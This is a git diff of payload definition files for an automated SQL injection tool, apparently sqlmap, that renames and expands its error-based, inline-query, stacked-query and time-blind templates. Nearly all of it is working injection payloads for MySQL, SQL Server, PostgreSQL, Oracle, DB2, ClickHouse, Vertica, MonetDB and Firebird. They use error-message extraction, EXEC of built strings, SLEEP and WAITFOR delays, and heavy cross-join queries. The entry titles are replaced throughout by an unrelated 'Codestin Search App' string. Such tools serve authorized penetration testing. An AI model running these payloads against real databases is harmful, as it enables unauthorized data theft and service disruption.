+ 1,8,91OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
@@ -332,9 +392,9 @@
Codestin Search App2
- 3
+ 43
- 1,9
+ 1,8,92OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)
@@ -354,7 +414,7 @@
211
- 1,9
+ 1,8,91AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)
@@ -373,7 +433,7 @@
213
- 1,9
+ 1,8,92OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)
@@ -392,7 +452,7 @@
211
- 1,9
+ 1,8,91AND [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
@@ -404,7 +464,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -413,7 +472,7 @@
223
- 1,9
+ 1,8,92OR [RANDNUM] IN (SELECT ('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
@@ -425,7 +484,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -434,7 +492,7 @@
221
- 1,9
+ 1,8,91AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
@@ -446,7 +504,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -455,7 +512,7 @@
233
- 1,9
+ 1,8,92OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
@@ -467,7 +524,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -476,7 +532,7 @@
221
- 1,9
+ 1,8,91AND [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
@@ -488,7 +544,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -497,7 +552,7 @@
233
- 1,9
+ 1,8,92OR [RANDNUM]=CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')
@@ -509,7 +564,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -672,7 +726,7 @@
231
- 1,9
+ 11AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
@@ -689,9 +743,9 @@
Codestin Search App2
- 3
+ 43
- 1,9
+ 12OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
@@ -704,6 +758,159 @@
Firebird
+
+
+ Codestin Search App
+ 2
+ 3
+ 1
+ 1
+ 1
+ AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MonetDB
+
+
+
+
+ Codestin Search App
+ 2
+ 4
+ 3
+ 1
+ 2
+ OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MonetDB
+
+
+
+
+ Codestin Search App
+ 2
+ 3
+ 1
+ 1
+ 1
+ AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)
+
+ AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Vertica
+
+
+
+
+ Codestin Search App
+ 2
+ 4
+ 3
+ 1
+ 2
+ OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)
+
+ OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Vertica
+
+
+
+
+ Codestin Search App
+ 2
+ 3
+ 1
+ 1
+ 1
+ AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ IBM DB2
+
+
+
+
+ Codestin Search App
+ 2
+ 4
+ 3
+ 1
+ 1
+ OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ IBM DB2
+
+
+
+
+ Codestin Search App
+ 2
+ 3
+ 1
+ 1,2,3,9
+ 1
+ AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
+
+ AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ ClickHouse
+
+
+
+
+ Codestin Search App
+ 2
+ 4
+ 3
+ 1,2,3,9
+ 1
+ OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
+
+ OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ ClickHouse
+
+
+
@@ -1029,6 +1273,26 @@
+
+ Codestin Search App
+ 2
+ 5
+ 1
+ 2,3
+ 1
+ ,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])
+
+ ,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ MySQL
+ >= 5.6
+
+
+
Codestin Search App2
@@ -1052,7 +1316,7 @@
Codestin Search App2
- 3
+ 412,31
@@ -1072,7 +1336,7 @@
Codestin Search App2
- 4
+ 312,31
@@ -1112,7 +1376,7 @@
Codestin Search App2
- 2
+ 312,31
@@ -1129,7 +1393,6 @@
-
Codestin Search App2
@@ -1185,7 +1448,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -1213,7 +1475,7 @@
251
- 2,3
+ 31,(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))
@@ -1226,9 +1488,51 @@
Firebird
+
+
+ Codestin Search App
+ 2
+ 5
+ 1
+ 3
+ 1
+ ,RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
+
+ ,RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ IBM DB2
+
+
+
+
+
+ Codestin Search App
+ 2
+ 2
+ 1
+ 1-8
+ 1
+ ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]');EXEC @[RANDSTR]
+
+ ;DECLARE @[RANDSTR] NVARCHAR(4000);SET @[RANDSTR]=(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]');EXEC @[RANDSTR]
+ --
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ Microsoft SQL Server
+ Sybase
+
+
+
diff --git a/xml/payloads/inline_query.xml b/data/xml/payloads/inline_query.xml
similarity index 64%
rename from xml/payloads/inline_query.xml
rename to data/xml/payloads/inline_query.xml
index b49d538346b..7269be695c4 100644
--- a/xml/payloads/inline_query.xml
+++ b/data/xml/payloads/inline_query.xml
@@ -3,19 +3,31 @@
- Codestin Search App
+ Codestin Search App3111,2,3,83
+ (SELECT CONCAT(CONCAT('[DELIMITER_START]',([QUERY])),'[DELIMITER_STOP]'))
+
+ (SELECT CONCAT(CONCAT('[DELIMITER_START]',(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)),'[DELIMITER_STOP]'))
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+
+
+ Codestin Search App
+ 3
+ 2
+ 1
+ 1,2,3,8
+ 3(SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
-
- (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))
+ (SELECT CONCAT('[DELIMITER_START]',(ELT([RANDNUM]=[RANDNUM],1)),'[DELIMITER_STOP]'))[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -28,7 +40,7 @@
Codestin Search App3
- 1
+ 211,2,3,83
@@ -47,13 +59,13 @@
Codestin Search App3
- 1
+ 211,2,3,83(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')
- (SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')
+ (SELECT '[DELIMITER_START]'+(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)+'[DELIMITER_STOP]')[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -61,7 +73,6 @@
Microsoft SQL ServerSybase
- Windows
@@ -74,7 +85,8 @@
3(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)
- (SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)
+
+ (SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN TO_NUMBER(1) ELSE TO_NUMBER(0) END)||'[DELIMITER_STOP]' FROM DUAL)[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -93,7 +105,7 @@
3SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'
- SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'
+ SELECT '[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)||'[DELIMITER_STOP]'[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
@@ -121,5 +133,25 @@
Firebird
+
+
+ Codestin Search App
+ 3
+ 3
+ 1
+ 1,2,3,8
+ 3
+ ('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')
+
+ ('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')
+
+
+ [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
+
+
+ ClickHouse
+
+
+
diff --git a/xml/payloads/stacked_queries.xml b/data/xml/payloads/stacked_queries.xml
similarity index 87%
rename from xml/payloads/stacked_queries.xml
rename to data/xml/payloads/stacked_queries.xml
index 2ecd2ef49b8..b431bb7849f 100644
--- a/xml/payloads/stacked_queries.xml
+++ b/data/xml/payloads/stacked_queries.xml
@@ -3,11 +3,11 @@
- Codestin Search App
+ Codestin Search App421
- 0
+ 1-81;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
@@ -19,16 +19,16 @@
MySQL
- > 5.0.11
+ >= 5.0.12
- Codestin Search App
+ Codestin Search App431
- 0
+ 1-81;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
@@ -39,16 +39,16 @@
MySQL
- > 5.0.11
+ >= 5.0.12
- Codestin Search App
+ Codestin Search App431
- 0
+ 1-81;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
@@ -60,16 +60,16 @@
MySQL
- > 5.0.11
+ >= 5.0.12
- Codestin Search App
+ Codestin Search App441
- 0
+ 1-81;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
@@ -80,16 +80,16 @@
MySQL
- > 5.0.11
+ >= 5.0.12
- Codestin Search App
+ Codestin Search App432
- 0
+ 1-81;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
@@ -105,11 +105,11 @@
- Codestin Search App
+ Codestin Search App452
- 0
+ 1-81;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
@@ -128,7 +128,7 @@
411
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
@@ -149,7 +149,7 @@
441
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
@@ -169,7 +169,7 @@
422
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
@@ -189,7 +189,7 @@
452
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)
@@ -208,7 +208,7 @@
431
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
@@ -230,7 +230,7 @@
451
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)
@@ -251,7 +251,7 @@
411
- 0
+ 1-81;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
@@ -264,7 +264,27 @@
Microsoft SQL ServerSybase
- Windows
+
+
+
+
+ Codestin Search App
+ 4
+ 2
+ 1
+ 1-8
+ 1
+ ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x
+
+ ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x
+ --
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
@@ -273,7 +293,7 @@
441
- 0
+ 1-81;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'
@@ -285,7 +305,26 @@
Microsoft SQL ServerSybase
- Windows
+
+
+
+
+ Codestin Search App
+ 4
+ 5
+ 1
+ 1-8
+ 1
+ ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x
+
+ ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x
+
+
+
+
+
+ Microsoft SQL Server
+ Sybase
@@ -294,7 +333,7 @@
411
- 0
+ 1-81;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL
@@ -314,7 +353,7 @@
441
- 0
+ 1-81;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL
@@ -333,7 +372,7 @@
422
- 0
+ 1-81;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL
@@ -353,7 +392,7 @@
452
- 0
+ 1-81;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL
@@ -372,7 +411,7 @@
441
- 0
+ 1-81;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END
@@ -392,7 +431,7 @@
451
- 0
+ 1-81;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END
@@ -411,7 +450,7 @@
451
- 0
+ 1-81;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END
@@ -431,7 +470,7 @@
451
- 0
+ 1-81;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END
@@ -447,10 +486,10 @@
Codestin Search App
- 5
+ 432
- 1,2,3,9
+ 1-81;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])
@@ -467,10 +506,10 @@
Codestin Search App
- 5
+ 452
- 1,2,3,9
+ 1-81;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])
@@ -489,7 +528,7 @@
432
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
@@ -510,7 +549,7 @@
452
- 0
+ 1-81;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)
@@ -530,7 +569,7 @@
442
- 0
+ 1-81;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE
@@ -551,7 +590,7 @@
452
- 0
+ 1-81;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE
@@ -568,10 +607,10 @@
Codestin Search App
- 5
+ 442
- 1,2,3,9
+ 1-81;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3
@@ -588,10 +627,10 @@
Codestin Search App
- 5
+ 452
- 1,2,3,9
+ 1-81;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3
@@ -610,7 +649,7 @@
442
- 0
+ 1-81;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END
@@ -631,7 +670,7 @@
452
- 0
+ 1-81;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END
@@ -651,7 +690,7 @@
442
- 0
+ 1-81;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END
@@ -672,7 +711,7 @@
452
- 0
+ 1-81;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END
diff --git a/xml/payloads/time_blind.xml b/data/xml/payloads/time_blind.xml
similarity index 89%
rename from xml/payloads/time_blind.xml
rename to data/xml/payloads/time_blind.xml
index f92112a7cf8..21a50ce4016 100644
--- a/xml/payloads/time_blind.xml
+++ b/data/xml/payloads/time_blind.xml
@@ -2,16 +2,18 @@
+
+
- Codestin Search App
+ Codestin Search App511
- 1,2,3,9
+ 1,2,3,8,91
- AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+ AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
- AND SLEEP([SLEEPTIME])
+ AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
@@ -23,15 +25,15 @@
- Codestin Search App
+ Codestin Search App5131,2,3,91
- OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
+ OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
- OR SLEEP([SLEEPTIME])
+ OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
@@ -43,16 +45,15 @@
- Codestin Search App
+ Codestin Search App5
- 3
+ 21
- 1,2,3,9
+ 1,2,3,8,91AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])AND SLEEP([SLEEPTIME])
- #
@@ -64,16 +65,15 @@
- Codestin Search App
+ Codestin Search App5
- 3
+ 231,2,3,91OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])OR SLEEP([SLEEPTIME])
- #
@@ -85,15 +85,16 @@
- Codestin Search App
+ Codestin Search App5
- 2
+ 311,2,3,91
- AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+ AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
- AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ AND SLEEP([SLEEPTIME])
+ #
@@ -105,15 +106,16 @@
- Codestin Search App
+ Codestin Search App5
- 2
+ 331,2,3,91
- OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+ OR [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
- OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ OR SLEEP([SLEEPTIME])
+ #
@@ -131,9 +133,9 @@
11,2,3,91
- AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+ AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
- AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])#
@@ -152,9 +154,9 @@
31,2,3,91
- OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+ OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
- OR (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ OR (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])#
@@ -167,11 +169,11 @@
- Codestin Search App
+ Codestin Search App522
- 1,2,3,9
+ 1,2,3,8,91AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])
@@ -182,12 +184,32 @@
MySQL
- <= 5.0.11
+ < 5.0.12
- Codestin Search App
+ Codestin Search App
+ 5
+ 3
+ 2
+ 1,2,3,8,9
+ 1
+ AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
+
+
+
+
+
+ MySQL
+ > 5.0.12
+
+
+
+
+ Codestin Search App523
@@ -202,12 +224,32 @@
MySQL
- <= 5.0.11
+ < 5.0.12
+
+
+
+
+ Codestin Search App
+ 5
+ 3
+ 3
+ 1,2,3,9
+ 1
+ OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
+
+
+
+
+
+ MySQL
+ > 5.0.12
- Codestin Search App
+ Codestin Search App552
@@ -223,12 +265,33 @@
MySQL
- <= 5.0.11
+ < 5.0.12
+
+
+
+
+ Codestin Search App
+ 5
+ 5
+ 2
+ 1,2,3,9
+ 1
+ AND [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
+
+ AND [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.12
- Codestin Search App
+ Codestin Search App553
@@ -244,7 +307,28 @@
MySQL
- <= 5.0.11
+ < 5.0.12
+
+
+
+
+ Codestin Search App
+ 5
+ 5
+ 3
+ 1,2,3,9
+ 1
+ OR [RANDNUM]=IF(([INFERENCE]),(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1),[RANDNUM])
+
+ OR [RANDNUM]=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)
+ #
+
+
+
+
+
+ MySQL
+ > 5.0.12
@@ -296,9 +380,9 @@
11,2,3,91
- RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
+ RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
- RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
+ RLIKE (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])
@@ -316,9 +400,9 @@
11,2,3,91
- RLIKE (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
